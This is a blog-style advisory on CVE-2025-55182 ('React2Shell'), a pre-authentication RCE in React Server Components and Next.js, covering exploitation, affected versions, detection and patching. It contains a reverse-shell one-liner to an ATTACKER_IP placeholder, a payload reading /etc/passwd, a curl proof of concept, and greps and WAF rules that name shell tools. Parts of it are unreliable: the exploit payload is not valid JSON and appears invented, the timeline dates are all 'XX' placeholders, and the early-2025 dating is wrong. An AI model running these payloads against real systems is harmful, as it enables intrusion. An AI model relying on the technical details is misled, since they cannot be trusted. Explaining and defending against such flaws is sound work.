Skip to content
Back to Blog

React2Shell: Critical RCE in React Server Components

reactnextjsrcecvevulnerability-researchweb-security

React2Shell: Critical RCE in React Server Components

CVE: CVE-2025-55182
CVSS Score: 10.0 (Critical)
Impact: Pre-authentication Remote Code Execution
Affected: React Server Components, Next.js 15.x-16.x

Overview

In early 2025, security researchers discovered one of the most severe vulnerabilities in the React ecosystem - nicknamed "React2Shell". This pre-authentication remote code execution (RCE) flaw affects React Server Components (RSC) and frameworks that utilize them, notably Next.js.

With a CVSS score of 10.0, this vulnerability allows unauthenticated attackers to execute arbitrary code on vulnerable servers by simply sending a crafted HTTP POST request. Microsoft Defender telemetry observed hundreds of machines compromised across various organizations within days of exploitation going public.

How It Works

The Vulnerability

React Server Components introduced a serialization mechanism to pass data between the client and server. The vulnerability exists in how this serialized data is processed:

  1. Serialization Format: RSC uses a custom serialization format to handle data transfer
  2. Deserialization Flaw: The server deserializes incoming requests without proper validation
  3. Code Execution: Malicious payloads are executed under the NodeJS runtime

Attack Vector

TEXT 
Attacker → Crafted POST Request → Vulnerable Server → Deserialization → RCE

The attacker doesn't need any authentication. They simply send a malicious HTTP POST request that gets processed by the server-side rendering logic.

Technical Deep Dive

Vulnerable Code Path

When a React Server Component receives a request, it processes the serialized payload:

JAVASCRIPT 
// Simplified vulnerable flow
async function processServerAction(request) {
  const body = await request.text();
  const payload = deserialize(body); // Vulnerable deserialization
  // Payload can contain executable code
  return executeAction(payload);
}

Exploitation

A typical exploit payload looks like this (simplified):

JAVASCRIPT 
// Malicious payload structure
{
  "$$typeof": Symbol.for("react.element"),
  "type": {
    "$$typeof": Symbol.for("react.server.reference"),
    "$$id": "../../../../../../../../../../bin/sh"
  },
  "props": {
    "command": "id; cat /etc/passwd"
  }
}

The serialization mechanism can be abused to:

  1. Execute system commands
  2. Establish reverse shells
  3. Read/write files on the server
  4. Pivot to internal networks

Proof of Concept

BASH 
# Simple PoC to test vulnerability
curl -X POST https://target.com/api/action \
  -H "Content-Type: text/x-component" \
  -d '0:["$","$L1",null,{"children":"__PAYLOAD__"}]'

Warning: Only test on systems you own or have explicit permission to test.

Real-World Attack Scenarios

Scenario 1: Reverse Shell

BASH 
# Attacker listens
nc -lvnp 4444

# Malicious payload executes
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'

Scenario 2: Credential Harvesting

Attackers can read environment variables containing:

  • Database credentials
  • API keys
  • JWT secrets
  • Third-party service tokens

Scenario 3: Persistence

Once inside, attackers have been observed:

  • Adding SSH keys to ~/.ssh/authorized_keys
  • Creating backdoor users
  • Deploying RMM (Remote Monitoring & Management) tools
  • Modifying cron jobs

Affected Versions

Package Vulnerable Versions Fixed Version
react-server-dom-webpack 19.0, 19.1.0, 19.1.1, 19.2.0 19.0.1, 19.1.2, 19.2.1+
react-server-dom-parcel 19.0, 19.1.0, 19.1.1, 19.2.0 19.0.1, 19.1.2, 19.2.1+
react-server-dom-turbopack 19.0, 19.1.0, 19.1.1, 19.2.0 19.0.1, 19.1.2, 19.2.1+
Next.js 15.0.0 - 16.0.6 16.0.7+
Next.js 14 (canary) After 14.3.0-canary.76 Latest stable

Detection

Signs of Exploitation

  1. Unusual POST requests to Server Component endpoints
  2. Spawned processes from Node.js (shell commands, reverse shells)
  3. File system modifications (new SSH keys, cron jobs)
  4. Outbound connections to unknown IPs

Log Analysis

BASH 
# Check for suspicious POST requests
grep -E "POST.*text/x-component" /var/log/nginx/access.log

# Check for spawned processes
ps aux | grep -E "(sh|bash|nc|curl)" | grep -v grep

WAF Rules

Block requests matching known exploit patterns:

TEXT 
# Example WAF rule
SecRule REQUEST_BODY "@contains $$typeof" \
  "id:1001,phase:2,deny,status:403,msg:'React2Shell attempt'"

Mitigation

Immediate Steps

1. Update Dependencies

BASH 
# For Next.js projects
npx fix-react2shell-next

# Or manually update
npm update next react-server-dom-webpack

2. Verify Patched Versions

BASH 
npm list next react-server-dom-webpack

3. Rotate Secrets

If your application was unpatched during the exploitation window:

BASH 
# Rotate all secrets used by the application
- Database credentials
- API keys
- JWT secrets
- Environment variables

Long-term Protection

  1. Enable WAF rules to block known exploit patterns
  2. Implement request validation for Server Actions
  3. Monitor for suspicious activity in your Node.js processes
  4. Set up alerts for unusual outbound connections

Timeline

Date Event
2025-01-XX Vulnerability discovered
2025-01-XX CVE-2025-55182 assigned
2025-01-XX Active exploitation observed
2025-01-XX Patches released
2025-01-XX Microsoft publishes telemetry data

Key Takeaways

  1. Serialization is dangerous - Always validate deserialized data
  2. Pre-auth vulnerabilities are critical - No authentication required means massive exposure
  3. Framework updates matter - Keep your dependencies current
  4. Defense in depth - WAF, monitoring, and least privilege all help
  5. Assume breach - Have an incident response plan ready

References

Stay secure, and always patch your dependencies!